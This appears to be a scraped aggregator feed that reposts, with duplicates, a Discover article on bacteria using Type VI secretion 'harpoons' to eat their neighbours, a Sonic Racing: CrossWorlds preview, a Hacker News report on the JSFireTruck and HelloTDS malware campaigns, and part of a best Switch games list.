• Hungry Bacteria Hunt Their Neighbors With Tiny, Poison-Tipped Harpoons

    Starving bacteriause a microscopic harpoon—called the Type VI secretion system—to stab and kill neighboring cells. The prey burst, turning spherical and leaking nutrients, which the killers then use to survive and grow.NewsletterSign up for our email newsletter for the latest science newsBacteria are bad neighbors. And we’re not talking noisy, never-take-out-the-trash bad neighbors. We’re talking has-a-harpoon-gun-and-points-it-at-you bad neighbors. According to a new study in Science, some bacteria hunt nearby bacterial species when they’re hungry. Using a special weapon system called the Type VI Secretion System, these bacteria shoot, spill, and then absorb the nutrients from the microbes they harpoon. “The punchline is: When things get tough, you eat your neighbors,” said Glen D’Souza, a study author and an assistant professor at Arizona State University, according to a press release. “We’ve known bacteria kill each other, that’s textbook. But what we’re seeing is that it’s not just important that the bacteria have weapons to kill, but they are controlling when they use those weapons specifically for situations to eat others where they can’t grow themselves.” According to the study authors, the research doesn’t just have implications for bacterial neighborhoods; it also has implications for human health and medicine. By harnessing these bacterial weapons, it may be possible to build better targeted antibiotics, designed to overcome antibiotic resistance. Ruthless Bacteria Use HarpoonsResearchers have long known that some bacteria can be ruthless, using weapons like the T6SS to clear out their competition. A nasty tool, the T6SS is essentially a tiny harpoon gun with a poison-tipped needle. When a bacterium shoots the weapon into another bacterium from a separate species, the needle pierces the microbe without killing it. Then, it injects toxins into the microbe that cause its internal nutrients to spill out.Up until now, researchers thought that this weapon helped bacteria eliminate their competition for space and for food, but after watching bacteria use the T6SS to attack their neighbors when food was scarce, the study authors concluded that these tiny harpooners use the weapon not only to remove rivals, but also to consume their competitors’ leaked nutrients.“Watching these cells in action really drives home how resourceful bacteria can be,” said Astrid Stubbusch, another study author and a researcher who worked on the study while at ETH Zurich, according to the press release. “By slowly releasing nutrients from their neighbors, they maximize their nutrient harvesting when every molecule counts.” Absorbing Food From NeighborsTo show that the bacteria used this system to eat when there was no food around, the study authors compared their attacks in both nutrient-rich and nutrient-poor environments. When supplied with ample resources, the bacteria used their harpoons to kill their neighbors quickly, with the released nutrients leaking out and dissolving immediately. But when resources were few and far between, they used their harpoons to kill their neighbors slowly, with the nutrients seeping out and sticking around. “This difference in dissolution time could mean that the killer cells load their spears with different toxins,” D’Souza said in another press release. While one toxin could eliminate the competition for space and for food when nutrients are available, another could create a food source, allowing bacteria to “absorb as many nutrients as possible” when sustenance is in short supply.Because of all this, this weapon system is more than ruthless; it’s also smart, and important to some species’ survival. When genetically unedited T6SS bacteria were put in an environment without food, they survived on spilled nutrients. But when genetically edited T6SS bacteria were placed in a similar environment, they died, because their ability to find food in their neighbors had been “turned off.”Harnessing Bacterial HarpoonsAccording to the study authors, the T6SS system is widely used by bacteria, both in and outside the lab. “It’s present in many different environments,” D’Souza said in one of the press releases. “It’s operational and happening in nature, from the oceans to the human gut.” The study authors add that their research could change the way we think about bacteria and could help in our fight against antibiotic resistance. In fact, the T6SS could one day serve as a foundation for targeted drug delivery systems, which could mitigate the development of broader bacterial resistance to antibiotics. But before that can happen, however, researchers have to learn more about bacterial harpoons, and about when and how bacteria use them, both to beat and eat their neighbors.Article SourcesOur writers at Discovermagazine.com use peer-reviewed studies and high-quality sources for our articles, and our editors review for scientific accuracy and editorial standards. Review the sources used below for this article:Sam Walters is a journalist covering archaeology, paleontology, ecology, and evolution for Discover, along with an assortment of other topics. Before joining the Discover team as an assistant editor in 2022, Sam studied journalism at Northwestern University in Evanston, Illinois.1 free article leftWant More? Get unlimited access for as low as /monthSubscribeAlready a subscriber?Register or Log In1 free articleSubscribeWant more?Keep reading for as low as !SubscribeAlready a subscriber?Register or Log In
    #hungry #bacteria #hunt #their #neighbors
    Hungry Bacteria Hunt Their Neighbors With Tiny, Poison-Tipped Harpoons
    Starving bacteriause a microscopic harpoon—called the Type VI secretion system—to stab and kill neighboring cells. The prey burst, turning spherical and leaking nutrients, which the killers then use to survive and grow.NewsletterSign up for our email newsletter for the latest science newsBacteria are bad neighbors. And we’re not talking noisy, never-take-out-the-trash bad neighbors. We’re talking has-a-harpoon-gun-and-points-it-at-you bad neighbors. According to a new study in Science, some bacteria hunt nearby bacterial species when they’re hungry. Using a special weapon system called the Type VI Secretion System, these bacteria shoot, spill, and then absorb the nutrients from the microbes they harpoon. “The punchline is: When things get tough, you eat your neighbors,” said Glen D’Souza, a study author and an assistant professor at Arizona State University, according to a press release. “We’ve known bacteria kill each other, that’s textbook. But what we’re seeing is that it’s not just important that the bacteria have weapons to kill, but they are controlling when they use those weapons specifically for situations to eat others where they can’t grow themselves.” According to the study authors, the research doesn’t just have implications for bacterial neighborhoods; it also has implications for human health and medicine. By harnessing these bacterial weapons, it may be possible to build better targeted antibiotics, designed to overcome antibiotic resistance. Ruthless Bacteria Use HarpoonsResearchers have long known that some bacteria can be ruthless, using weapons like the T6SS to clear out their competition. A nasty tool, the T6SS is essentially a tiny harpoon gun with a poison-tipped needle. When a bacterium shoots the weapon into another bacterium from a separate species, the needle pierces the microbe without killing it. Then, it injects toxins into the microbe that cause its internal nutrients to spill out.Up until now, researchers thought that this weapon helped bacteria eliminate their competition for space and for food, but after watching bacteria use the T6SS to attack their neighbors when food was scarce, the study authors concluded that these tiny harpooners use the weapon not only to remove rivals, but also to consume their competitors’ leaked nutrients.“Watching these cells in action really drives home how resourceful bacteria can be,” said Astrid Stubbusch, another study author and a researcher who worked on the study while at ETH Zurich, according to the press release. “By slowly releasing nutrients from their neighbors, they maximize their nutrient harvesting when every molecule counts.” Absorbing Food From NeighborsTo show that the bacteria used this system to eat when there was no food around, the study authors compared their attacks in both nutrient-rich and nutrient-poor environments. When supplied with ample resources, the bacteria used their harpoons to kill their neighbors quickly, with the released nutrients leaking out and dissolving immediately. But when resources were few and far between, they used their harpoons to kill their neighbors slowly, with the nutrients seeping out and sticking around. “This difference in dissolution time could mean that the killer cells load their spears with different toxins,” D’Souza said in another press release. While one toxin could eliminate the competition for space and for food when nutrients are available, another could create a food source, allowing bacteria to “absorb as many nutrients as possible” when sustenance is in short supply.Because of all this, this weapon system is more than ruthless; it’s also smart, and important to some species’ survival. When genetically unedited T6SS bacteria were put in an environment without food, they survived on spilled nutrients. But when genetically edited T6SS bacteria were placed in a similar environment, they died, because their ability to find food in their neighbors had been “turned off.”Harnessing Bacterial HarpoonsAccording to the study authors, the T6SS system is widely used by bacteria, both in and outside the lab. “It’s present in many different environments,” D’Souza said in one of the press releases. “It’s operational and happening in nature, from the oceans to the human gut.” The study authors add that their research could change the way we think about bacteria and could help in our fight against antibiotic resistance. In fact, the T6SS could one day serve as a foundation for targeted drug delivery systems, which could mitigate the development of broader bacterial resistance to antibiotics. But before that can happen, however, researchers have to learn more about bacterial harpoons, and about when and how bacteria use them, both to beat and eat their neighbors.Article SourcesOur writers at Discovermagazine.com use peer-reviewed studies and high-quality sources for our articles, and our editors review for scientific accuracy and editorial standards. Review the sources used below for this article:Sam Walters is a journalist covering archaeology, paleontology, ecology, and evolution for Discover, along with an assortment of other topics. Before joining the Discover team as an assistant editor in 2022, Sam studied journalism at Northwestern University in Evanston, Illinois.1 free article leftWant More? Get unlimited access for as low as /monthSubscribeAlready a subscriber?Register or Log In1 free articleSubscribeWant more?Keep reading for as low as !SubscribeAlready a subscriber?Register or Log In #hungry #bacteria #hunt #their #neighbors
    WWW.DISCOVERMAGAZINE.COM
    Hungry Bacteria Hunt Their Neighbors With Tiny, Poison-Tipped Harpoons
    Starving bacteria (cyan) use a microscopic harpoon—called the Type VI secretion system—to stab and kill neighboring cells (magenta). The prey burst, turning spherical and leaking nutrients, which the killers then use to survive and grow. (Image Credit: Glen D'Souza/ASU/Screen shot from video)NewsletterSign up for our email newsletter for the latest science newsBacteria are bad neighbors. And we’re not talking noisy, never-take-out-the-trash bad neighbors. We’re talking has-a-harpoon-gun-and-points-it-at-you bad neighbors. According to a new study in Science, some bacteria hunt nearby bacterial species when they’re hungry. Using a special weapon system called the Type VI Secretion System (T6SS), these bacteria shoot, spill, and then absorb the nutrients from the microbes they harpoon. “The punchline is: When things get tough, you eat your neighbors,” said Glen D’Souza, a study author and an assistant professor at Arizona State University, according to a press release. “We’ve known bacteria kill each other, that’s textbook. But what we’re seeing is that it’s not just important that the bacteria have weapons to kill, but they are controlling when they use those weapons specifically for situations to eat others where they can’t grow themselves.” According to the study authors, the research doesn’t just have implications for bacterial neighborhoods; it also has implications for human health and medicine. By harnessing these bacterial weapons, it may be possible to build better targeted antibiotics, designed to overcome antibiotic resistance. Ruthless Bacteria Use HarpoonsResearchers have long known that some bacteria can be ruthless, using weapons like the T6SS to clear out their competition. A nasty tool, the T6SS is essentially a tiny harpoon gun with a poison-tipped needle. When a bacterium shoots the weapon into another bacterium from a separate species, the needle pierces the microbe without killing it. Then, it injects toxins into the microbe that cause its internal nutrients to spill out.Up until now, researchers thought that this weapon helped bacteria eliminate their competition for space and for food, but after watching bacteria use the T6SS to attack their neighbors when food was scarce, the study authors concluded that these tiny harpooners use the weapon not only to remove rivals, but also to consume their competitors’ leaked nutrients.“Watching these cells in action really drives home how resourceful bacteria can be,” said Astrid Stubbusch, another study author and a researcher who worked on the study while at ETH Zurich, according to the press release. “By slowly releasing nutrients from their neighbors, they maximize their nutrient harvesting when every molecule counts.” Absorbing Food From NeighborsTo show that the bacteria used this system to eat when there was no food around, the study authors compared their attacks in both nutrient-rich and nutrient-poor environments. When supplied with ample resources, the bacteria used their harpoons to kill their neighbors quickly, with the released nutrients leaking out and dissolving immediately. But when resources were few and far between, they used their harpoons to kill their neighbors slowly, with the nutrients seeping out and sticking around. “This difference in dissolution time could mean that the killer cells load their spears with different toxins,” D’Souza said in another press release. While one toxin could eliminate the competition for space and for food when nutrients are available, another could create a food source, allowing bacteria to “absorb as many nutrients as possible” when sustenance is in short supply.Because of all this, this weapon system is more than ruthless; it’s also smart, and important to some species’ survival. When genetically unedited T6SS bacteria were put in an environment without food, they survived on spilled nutrients. But when genetically edited T6SS bacteria were placed in a similar environment, they died, because their ability to find food in their neighbors had been “turned off.”Harnessing Bacterial HarpoonsAccording to the study authors, the T6SS system is widely used by bacteria, both in and outside the lab. “It’s present in many different environments,” D’Souza said in one of the press releases. “It’s operational and happening in nature, from the oceans to the human gut.” The study authors add that their research could change the way we think about bacteria and could help in our fight against antibiotic resistance. In fact, the T6SS could one day serve as a foundation for targeted drug delivery systems, which could mitigate the development of broader bacterial resistance to antibiotics. But before that can happen, however, researchers have to learn more about bacterial harpoons, and about when and how bacteria use them, both to beat and eat their neighbors.Article SourcesOur writers at Discovermagazine.com use peer-reviewed studies and high-quality sources for our articles, and our editors review for scientific accuracy and editorial standards. Review the sources used below for this article:Sam Walters is a journalist covering archaeology, paleontology, ecology, and evolution for Discover, along with an assortment of other topics. Before joining the Discover team as an assistant editor in 2022, Sam studied journalism at Northwestern University in Evanston, Illinois.1 free article leftWant More? Get unlimited access for as low as $1.99/monthSubscribeAlready a subscriber?Register or Log In1 free articleSubscribeWant more?Keep reading for as low as $1.99!SubscribeAlready a subscriber?Register or Log In
    Like
    Love
    Wow
    Sad
    Angry
    375
    2 Комментарии 0 Поделились 0 предпросмотр
  • Can Sonic Racing: CrossWorlds Outrun Mario Kart World?

    Mario Kart World is one of the year's hottest games, but its pivot to an open world setting, while peeling back kart customization options, opened a massive rift for Sonic Racing: CrossWorlds to drift into. And Sega is determined to do everything possible to make its kart racer the one to beat by including numerous guest characters and cross-platform, multiplayer contests. I took Sonic Racing: CrossWorlds for a test drive at the Summer Game Fest, and it's a strong contender racing game of the year.Sonic Racing: CrossWorlds' Deep Kart CustomizationThe biggest difference between Sonic Racing: CrossWorlds and Mario Kart World is that Sega's title focuses on kart customization. I'm not just talking about colors and tires; CrossWorlds introduces Gadgets, add-ons that augment your car, giving your whip helpful abilities to bring into the race. Each ride has a license plate with six slots where you can slot your chosen Gadgets. A Gadget can take up one, two, or three slots, so the idea is to find a mix that pairs well with character traits. There's a surprising amount of depth for people who want to min/max their favorite anthropomorphic animal.I chose Sonic, a speed character, and added a Gadget that started him with two boosts, a Gadget that improved his speed while trailing an opponent, and a Gadget that improved acceleration. There were so many Gadgets that I could have easily spent my entire demo session building a car to match my playstyle. I envision people happily getting lost in the weeds before participating in their first race.Gameplay: This Ain't Mario Kart WorldAlthough it's not an open world like Mario Kart World, Sonic Racing: CrossWorlds injects a unique spin on traditional kart racing. The familiar trappings are all here, such as rings to boost your top speed. Each Grand Prix consists of three maps, but the gimmick at play is stage transitions. Recommended by Our EditorsAbout a third of the way down a course, a giant ring-portal opens, presenting a new world and track. The shift in tone and terrain keeps the races fast-paced and unpredictable. I particularly liked how whoever is in first place can sometimes choose which CrossWorlds track to go down, controlling the tempo. With every race completion, you earn credits based on your performance that you can cash in for new car parts.In a stark contrast to Mario Kart World, Sonic Racing: CrossWorlds is far more aggressive, even on lower difficulties. At the start of each grand prix, the game assigns you a rival—this is the character to beat, and the one who taunts you all match. Beat them all, and you can race high-powered Super variants.Just about everything caused you to lose rings: bumping into other players, the walls, and, of course, getting hit by items. The series' trademark rubberband AI is still in place, too. Even in the press demo, I wasn't safe from taking four items back to back and being knocked off the stage mere feet away from the finish line.The demo didn't include the new characters that debuted at the Summer Game Fest, but I studied the character screen to see who else could be coming to the game. Including the 12 Sonic characters available in the demo, I counted a whopping 64 character slots. They include Hatsune Miku, Joker, Ichiban Kasuga, and Steve. However, I hope to see other classic Sega IPs like in previous Sonic Racing titles.Platforms and Release DateWill Sega do what Nintendon't? I had an exhilarating time playing Sonic Racing: CrossWorld, and I can't wait to see more wild track compositions. Sonic Racing: CrossWorlds will be available on Nintendo Switch, PC, PlayStation 4, PlayStation 5, Xbox One, and Xbox Series X/S on Sept. 25, 2025. A Nintendo Switch 2 version is planned for later in the year.
    #can #sonic #racing #crossworlds #outrun
    Can Sonic Racing: CrossWorlds Outrun Mario Kart World?
    Mario Kart World is one of the year's hottest games, but its pivot to an open world setting, while peeling back kart customization options, opened a massive rift for Sonic Racing: CrossWorlds to drift into. And Sega is determined to do everything possible to make its kart racer the one to beat by including numerous guest characters and cross-platform, multiplayer contests. I took Sonic Racing: CrossWorlds for a test drive at the Summer Game Fest, and it's a strong contender racing game of the year.Sonic Racing: CrossWorlds' Deep Kart CustomizationThe biggest difference between Sonic Racing: CrossWorlds and Mario Kart World is that Sega's title focuses on kart customization. I'm not just talking about colors and tires; CrossWorlds introduces Gadgets, add-ons that augment your car, giving your whip helpful abilities to bring into the race. Each ride has a license plate with six slots where you can slot your chosen Gadgets. A Gadget can take up one, two, or three slots, so the idea is to find a mix that pairs well with character traits. There's a surprising amount of depth for people who want to min/max their favorite anthropomorphic animal.I chose Sonic, a speed character, and added a Gadget that started him with two boosts, a Gadget that improved his speed while trailing an opponent, and a Gadget that improved acceleration. There were so many Gadgets that I could have easily spent my entire demo session building a car to match my playstyle. I envision people happily getting lost in the weeds before participating in their first race.Gameplay: This Ain't Mario Kart WorldAlthough it's not an open world like Mario Kart World, Sonic Racing: CrossWorlds injects a unique spin on traditional kart racing. The familiar trappings are all here, such as rings to boost your top speed. Each Grand Prix consists of three maps, but the gimmick at play is stage transitions. Recommended by Our EditorsAbout a third of the way down a course, a giant ring-portal opens, presenting a new world and track. The shift in tone and terrain keeps the races fast-paced and unpredictable. I particularly liked how whoever is in first place can sometimes choose which CrossWorlds track to go down, controlling the tempo. With every race completion, you earn credits based on your performance that you can cash in for new car parts.In a stark contrast to Mario Kart World, Sonic Racing: CrossWorlds is far more aggressive, even on lower difficulties. At the start of each grand prix, the game assigns you a rival—this is the character to beat, and the one who taunts you all match. Beat them all, and you can race high-powered Super variants.Just about everything caused you to lose rings: bumping into other players, the walls, and, of course, getting hit by items. The series' trademark rubberband AI is still in place, too. Even in the press demo, I wasn't safe from taking four items back to back and being knocked off the stage mere feet away from the finish line.The demo didn't include the new characters that debuted at the Summer Game Fest, but I studied the character screen to see who else could be coming to the game. Including the 12 Sonic characters available in the demo, I counted a whopping 64 character slots. They include Hatsune Miku, Joker, Ichiban Kasuga, and Steve. However, I hope to see other classic Sega IPs like in previous Sonic Racing titles.Platforms and Release DateWill Sega do what Nintendon't? I had an exhilarating time playing Sonic Racing: CrossWorld, and I can't wait to see more wild track compositions. Sonic Racing: CrossWorlds will be available on Nintendo Switch, PC, PlayStation 4, PlayStation 5, Xbox One, and Xbox Series X/S on Sept. 25, 2025. A Nintendo Switch 2 version is planned for later in the year. #can #sonic #racing #crossworlds #outrun
    ME.PCMAG.COM
    Can Sonic Racing: CrossWorlds Outrun Mario Kart World?
    Mario Kart World is one of the year's hottest games, but its pivot to an open world setting, while peeling back kart customization options, opened a massive rift for Sonic Racing: CrossWorlds to drift into. And Sega is determined to do everything possible to make its kart racer the one to beat by including numerous guest characters and cross-platform, multiplayer contests. I took Sonic Racing: CrossWorlds for a test drive at the Summer Game Fest, and it's a strong contender racing game of the year.Sonic Racing: CrossWorlds' Deep Kart CustomizationThe biggest difference between Sonic Racing: CrossWorlds and Mario Kart World is that Sega's title focuses on kart customization. I'm not just talking about colors and tires; CrossWorlds introduces Gadgets, add-ons that augment your car, giving your whip helpful abilities to bring into the race. (Credit: Sega)Each ride has a license plate with six slots where you can slot your chosen Gadgets. A Gadget can take up one, two, or three slots, so the idea is to find a mix that pairs well with character traits. There's a surprising amount of depth for people who want to min/max their favorite anthropomorphic animal.I chose Sonic, a speed character, and added a Gadget that started him with two boosts (one slot), a Gadget that improved his speed while trailing an opponent (two slots), and a Gadget that improved acceleration (three slots). There were so many Gadgets that I could have easily spent my entire demo session building a car to match my playstyle. I envision people happily getting lost in the weeds before participating in their first race.(Credit: Sega)Gameplay: This Ain't Mario Kart WorldAlthough it's not an open world like Mario Kart World, Sonic Racing: CrossWorlds injects a unique spin on traditional kart racing. The familiar trappings are all here, such as rings to boost your top speed. Each Grand Prix consists of three maps, but the gimmick at play is stage transitions. Recommended by Our EditorsAbout a third of the way down a course, a giant ring-portal opens, presenting a new world and track (hence the name "CrossWorlds"). The shift in tone and terrain keeps the races fast-paced and unpredictable. I particularly liked how whoever is in first place can sometimes choose which CrossWorlds track to go down, controlling the tempo. With every race completion, you earn credits based on your performance that you can cash in for new car parts.In a stark contrast to Mario Kart World, Sonic Racing: CrossWorlds is far more aggressive, even on lower difficulties. At the start of each grand prix, the game assigns you a rival—this is the character to beat, and the one who taunts you all match. Beat them all, and you can race high-powered Super variants.Just about everything caused you to lose rings: bumping into other players, the walls, and, of course, getting hit by items. The series' trademark rubberband AI is still in place, too. Even in the press demo, I wasn't safe from taking four items back to back and being knocked off the stage mere feet away from the finish line.(Credit: Sega)The demo didn't include the new characters that debuted at the Summer Game Fest, but I studied the character screen to see who else could be coming to the game. Including the 12 Sonic characters available in the demo, I counted a whopping 64 character slots. They include Hatsune Miku (the ultra-popular Vocaloid), Joker (from Persona 5), Ichiban Kasuga (from Like a Dragon), and Steve (from Minecraft). However, I hope to see other classic Sega IPs like in previous Sonic Racing titles.Platforms and Release DateWill Sega do what Nintendon't? I had an exhilarating time playing Sonic Racing: CrossWorld, and I can't wait to see more wild track compositions. Sonic Racing: CrossWorlds will be available on Nintendo Switch, PC, PlayStation 4, PlayStation 5, Xbox One, and Xbox Series X/S on Sept. 25, 2025. A Nintendo Switch 2 version is planned for later in the year.
    0 Комментарии 0 Поделились 0 предпросмотр
  • Over 269,000 Websites Infected with JSFireTruck JavaScript Malware in One Month

    Jun 13, 2025Ravie LakshmananWeb Security / Network Security

    Cybersecurity researchers are calling attention to a "large-scale campaign" that has been observed compromising legitimate websites with malicious JavaScript injections.
    According to Palo Alto Networks Unit 42, these malicious injects are obfuscated using JSFuck, which refers to an "esoteric and educational programming style" that uses only a limited set of characters to write and execute code.
    The cybersecurity company has given the technique an alternate name JSFireTruck owing to the profanity involved.
    "Multiple websites have been identified with injected malicious JavaScript that uses JSFireTruck obfuscation, which is composed primarily of the symbols, +, {, and }," security researchers Hardik Shah, Brad Duncan, and Pranay Kumar Chhaparwal said. "The code's obfuscation hides its true purpose, hindering analysis."

    Further analysis has determined that the injected code is designed to check the website referrer, which identifies the address of the web page from which a request originated.
    Should the referrer be a search engine such as Google, Bing, DuckDuckGo, Yahoo!, or AOL, the JavaScript code redirects victims to malicious URLs that can deliver malware, exploits, traffic monetization, and malvertising.

    Unit 42 said its telemetry uncovered 269,552 web pages that have been infected with JavaScript code using the JSFireTruck technique between March 26 and April 25, 2025. A spike in the campaign was first recorded on April 12, when over 50,000 infected web pages were observed in a single day.
    "The campaign's scale and stealth pose a significant threat," the researchers said. "The widespread nature of these infections suggests a coordinated effort to compromise legitimate websites as attack vectors for further malicious activities."
    Say Hello to HelloTDS
    The development comes as Gen Digital took the wraps off a sophisticated Traffic Distribution Servicecalled HelloTDS that's designed to conditionally redirect site visitors to fake CAPTCHA pages, tech support scams, fake browser updates, unwanted browser extensions, and cryptocurrency scams through remotely-hosted JavaScript code injected into the sites.
    The primary objective of the TDS is to act as a gateway, determining the exact nature of content to be delivered to the victims after fingerprinting their devices. If the user is not deemed a suitable target, the victim is redirected to a benign web page.

    "The campaign entry points are infected or otherwise attacker-controlled streaming websites, file sharing services, as well as malvertising campaigns," researchers Vojtěch Krejsa and Milan Špinka said in a report published this month.
    "Victims are evaluated based on geolocation, IP address, and browser fingerprinting; for example, connections through VPNs or headless browsers are detected and rejected."
    Some of these attack chains have been found to serve bogus CAPTCHA pages that leverage the ClickFix strategy to trick users into running malicious code and infecting their machines with a malware known as PEAKLIGHT, which is known to server information stealers like Lumma.

    Central to the HelloTDS infrastructure is the use of .top, .shop, and .com top-level domains that are used to host the JavaScript code and trigger the redirections following a multi-stage fingerprinting process engineered to collect network and browser information.
    "The HelloTDS infrastructure behind fake CAPTCHA campaigns demonstrates how attackers continue to refine their methods to bypass traditional protections, evade detection, and selectively target victims," the researchers said.
    "By leveraging sophisticated fingerprinting, dynamic domain infrastructure, and deception tacticsthese campaigns achieve both stealth and scale."

    Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.

    SHARE




    #over #websites #infected #with #jsfiretruck
    Over 269,000 Websites Infected with JSFireTruck JavaScript Malware in One Month
    Jun 13, 2025Ravie LakshmananWeb Security / Network Security Cybersecurity researchers are calling attention to a "large-scale campaign" that has been observed compromising legitimate websites with malicious JavaScript injections. According to Palo Alto Networks Unit 42, these malicious injects are obfuscated using JSFuck, which refers to an "esoteric and educational programming style" that uses only a limited set of characters to write and execute code. The cybersecurity company has given the technique an alternate name JSFireTruck owing to the profanity involved. "Multiple websites have been identified with injected malicious JavaScript that uses JSFireTruck obfuscation, which is composed primarily of the symbols, +, {, and }," security researchers Hardik Shah, Brad Duncan, and Pranay Kumar Chhaparwal said. "The code's obfuscation hides its true purpose, hindering analysis." Further analysis has determined that the injected code is designed to check the website referrer, which identifies the address of the web page from which a request originated. Should the referrer be a search engine such as Google, Bing, DuckDuckGo, Yahoo!, or AOL, the JavaScript code redirects victims to malicious URLs that can deliver malware, exploits, traffic monetization, and malvertising. Unit 42 said its telemetry uncovered 269,552 web pages that have been infected with JavaScript code using the JSFireTruck technique between March 26 and April 25, 2025. A spike in the campaign was first recorded on April 12, when over 50,000 infected web pages were observed in a single day. "The campaign's scale and stealth pose a significant threat," the researchers said. "The widespread nature of these infections suggests a coordinated effort to compromise legitimate websites as attack vectors for further malicious activities." Say Hello to HelloTDS The development comes as Gen Digital took the wraps off a sophisticated Traffic Distribution Servicecalled HelloTDS that's designed to conditionally redirect site visitors to fake CAPTCHA pages, tech support scams, fake browser updates, unwanted browser extensions, and cryptocurrency scams through remotely-hosted JavaScript code injected into the sites. The primary objective of the TDS is to act as a gateway, determining the exact nature of content to be delivered to the victims after fingerprinting their devices. If the user is not deemed a suitable target, the victim is redirected to a benign web page. "The campaign entry points are infected or otherwise attacker-controlled streaming websites, file sharing services, as well as malvertising campaigns," researchers Vojtěch Krejsa and Milan Špinka said in a report published this month. "Victims are evaluated based on geolocation, IP address, and browser fingerprinting; for example, connections through VPNs or headless browsers are detected and rejected." Some of these attack chains have been found to serve bogus CAPTCHA pages that leverage the ClickFix strategy to trick users into running malicious code and infecting their machines with a malware known as PEAKLIGHT, which is known to server information stealers like Lumma. Central to the HelloTDS infrastructure is the use of .top, .shop, and .com top-level domains that are used to host the JavaScript code and trigger the redirections following a multi-stage fingerprinting process engineered to collect network and browser information. "The HelloTDS infrastructure behind fake CAPTCHA campaigns demonstrates how attackers continue to refine their methods to bypass traditional protections, evade detection, and selectively target victims," the researchers said. "By leveraging sophisticated fingerprinting, dynamic domain infrastructure, and deception tacticsthese campaigns achieve both stealth and scale." Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE     #over #websites #infected #with #jsfiretruck
    THEHACKERNEWS.COM
    Over 269,000 Websites Infected with JSFireTruck JavaScript Malware in One Month
    Jun 13, 2025Ravie LakshmananWeb Security / Network Security Cybersecurity researchers are calling attention to a "large-scale campaign" that has been observed compromising legitimate websites with malicious JavaScript injections. According to Palo Alto Networks Unit 42, these malicious injects are obfuscated using JSFuck, which refers to an "esoteric and educational programming style" that uses only a limited set of characters to write and execute code. The cybersecurity company has given the technique an alternate name JSFireTruck owing to the profanity involved. "Multiple websites have been identified with injected malicious JavaScript that uses JSFireTruck obfuscation, which is composed primarily of the symbols [, ], +, $, {, and }," security researchers Hardik Shah, Brad Duncan, and Pranay Kumar Chhaparwal said. "The code's obfuscation hides its true purpose, hindering analysis." Further analysis has determined that the injected code is designed to check the website referrer ("document.referrer"), which identifies the address of the web page from which a request originated. Should the referrer be a search engine such as Google, Bing, DuckDuckGo, Yahoo!, or AOL, the JavaScript code redirects victims to malicious URLs that can deliver malware, exploits, traffic monetization, and malvertising. Unit 42 said its telemetry uncovered 269,552 web pages that have been infected with JavaScript code using the JSFireTruck technique between March 26 and April 25, 2025. A spike in the campaign was first recorded on April 12, when over 50,000 infected web pages were observed in a single day. "The campaign's scale and stealth pose a significant threat," the researchers said. "The widespread nature of these infections suggests a coordinated effort to compromise legitimate websites as attack vectors for further malicious activities." Say Hello to HelloTDS The development comes as Gen Digital took the wraps off a sophisticated Traffic Distribution Service (TDS) called HelloTDS that's designed to conditionally redirect site visitors to fake CAPTCHA pages, tech support scams, fake browser updates, unwanted browser extensions, and cryptocurrency scams through remotely-hosted JavaScript code injected into the sites. The primary objective of the TDS is to act as a gateway, determining the exact nature of content to be delivered to the victims after fingerprinting their devices. If the user is not deemed a suitable target, the victim is redirected to a benign web page. "The campaign entry points are infected or otherwise attacker-controlled streaming websites, file sharing services, as well as malvertising campaigns," researchers Vojtěch Krejsa and Milan Špinka said in a report published this month. "Victims are evaluated based on geolocation, IP address, and browser fingerprinting; for example, connections through VPNs or headless browsers are detected and rejected." Some of these attack chains have been found to serve bogus CAPTCHA pages that leverage the ClickFix strategy to trick users into running malicious code and infecting their machines with a malware known as PEAKLIGHT (aka Emmenhtal Loader), which is known to server information stealers like Lumma. Central to the HelloTDS infrastructure is the use of .top, .shop, and .com top-level domains that are used to host the JavaScript code and trigger the redirections following a multi-stage fingerprinting process engineered to collect network and browser information. "The HelloTDS infrastructure behind fake CAPTCHA campaigns demonstrates how attackers continue to refine their methods to bypass traditional protections, evade detection, and selectively target victims," the researchers said. "By leveraging sophisticated fingerprinting, dynamic domain infrastructure, and deception tactics (such as mimicking legitimate websites and serving benign content to researchers) these campaigns achieve both stealth and scale." Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE    
    0 Комментарии 0 Поделились 0 предпросмотр
  • The Best Nintendo Switch Games for 2025

    The Best Games on Every Platform

    Animal Crossing: New Horizons

    Animal Crossing: New Horizons4.0 Excellent

    No game may end up defining 2020 more than Animal Crossing: New Horizons. Nintendo’s adorable life simulator has always had its fans. However, with the real world under lockdown, countless players have flocked to their own virtual islands to find community. Paying a mortgage to a raccoon is a small price to pay for the freedom to relax in your own social life again.

    Advance Wars 1+2: Re-Boot Camp

    Advance Wars 1 + 2: Re-Boot Camp

    4.0 Excellent

    Fire Emblem isn't Nintendo's only awesome strategy series. If you prefer soldiers and tanks over knights and horses, check out Advance Wars and its terrific turn-based tactics. This remake includes campaigns from the first two Game Boy Advance games, offering hours upon hours of brilliantly designed missions. You can also design your own maps and play against friends online.
    Advance Wars 1 + 2: Re-Boot Camp review

    ARMS

    ARMS4.0 Excellent

    ARMS is Nintendo's newest take on the fighting game genre. It combines cartoonish aesthetics, sci-fi weapons, and arm-stretching boxing into an accessible, offbeat fighter with a lot of variety. It's a polished, fun, competitive game that bears more than a passing visual similarity to Splatoon. Though time will tell if ARMS gains any momentum within the esports scene, the game offers plenty of opportunity to swing fists at your friends.

    Bayonetta 2

    Bayonetta 24.5 Excellent

    Bayonetta 2 is another fantastic game that launched on the wrong system. Years later its initial release, Bayo 2 still stands as one of the best action games out there, and now that it's been ported from the Wii U to the Switch it can get the attention and devotion it deserves. Tight controls, robust challenge, and plenty of style make this stand out as a pinnacle of action games.

    Bayonetta 3

    Bayonetta 34.5 Excellent

    Just when you thought Bayonetta couldn’t get any more bewitching, PlatinumGames delivers an absolute master class on video game action with Bayonetta 3. Besides Bayonetta’s familiar punches, kicks, and guns, you can further expand her combat options by summoning giant demons and directing their attacks. Meanwhile, the multiversal story is ridiculous, even by Bayonetta standards.

    Bloodstained: Ritual of the Night

    Bloodstained: Ritual of the Night4.0 Excellent

    If Bloodstained: Ritual of the Night's story of a demonic castle and a lone savior sounds incredibly familiar, it should: the game was spearheaded by Koji Igarashi, the big brain behind many revered Castlevania games. Bloodstained is an excellent Castlevania game in everything but name, hitting the same beats Symphony of the Night, Aria of Sorrow, and Order of Ecclesia did. If you're thirsty for a new, enjoyable Castlevania-like game that calls back to before Lords of Shadow rebooted the series and Mirror of Fate completely failed to capture any of its luster, this is the game for you.

